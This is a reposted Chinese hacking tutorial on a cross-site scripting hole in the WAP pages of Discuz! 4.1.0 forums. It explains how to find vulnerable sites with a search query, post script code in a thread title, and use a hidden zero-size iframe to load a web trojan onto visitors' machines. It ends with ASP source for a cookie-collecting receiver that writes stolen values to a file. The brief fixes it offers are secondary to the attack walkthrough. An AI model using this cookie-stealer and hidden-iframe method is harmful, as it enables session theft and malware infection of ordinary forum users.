老文章了。。。以前貌似没转来过。。补上。
漏洞分析:Discuz!4.1.0对开放WAP页面的过滤不严是造成这个漏洞的原因。漏洞涉及到了Dz4.1.0所有开放了WAP功能的论坛。利用者可以通过工具提交一段恶意代码来实现跨站攻击。
利用工具:
1. WAP浏览器
2. WAP编码转换器(可选)
实战:
首先,我们在google中搜索关键字 intextowered by Discuz! 4.1.0 会找到很多用了该程序的国内论坛。随便找到一个网站,我们进去先随便注册一个帐号。
打开我们的WAP浏览工具WapDisplayer,在地址栏处输入这个网址,打开wap页,如图一所示:
我们点击“登陆”在下面输入我们刚刚注册的用户名和密码,如图二所示:
如果出现以下出错提示,则说明该论坛未开启WAP功能,我们便无法进行下一步的入侵了。只能再找其他的网站。
如果正常访问,会出现主题列表,我们可以随便选择一个有发贴权限的板块,点击下面的“发表话题”,如图所示。在出来的“标题”中填入我们的跨站代码,在“内容”处随便输入。之后点击“提交”。如果出现“提交成功”;那么恭喜你!基本可以说已经搞定了!
我们回到刚才我们跨站过的页面看一下。这里我用了两个代码,一个是把我们网站的首页挂在了论坛上,一个是插入“Hello!
的时候,就会看到如图所示的页面。对于第一个,如果把它改成了隐藏的网页木马地址。对方就会在浏览论坛时不知不觉中中了我们的木马!
以上两段代码的构造非常简单,大家都明白,我这里就不写了。
解决办法:1.论坛换为更为稳定的4.0.0版本。毕竟现在的这个版本还在测试阶段。
2.停止掉论坛的WAP功能。
中文WAP浏览器WapDisplayer
http://download.enet.com.cn/html/010022005092702.html
附:获取cookie的asp源代码:
<% testfile=Server.MapPath("cookies.txt") msg=Request("msg") set fs=server.CreateObject("scripting.filesystemobject") set thisfile=fs.OpenTextFile(testfile,8,True,0) thisfile.WriteLine(""&msg& "") thisfile.close set fs = nothing %>
嵌入代码: <iframe height=0 width=0 src="http://xxx"></iframe>
|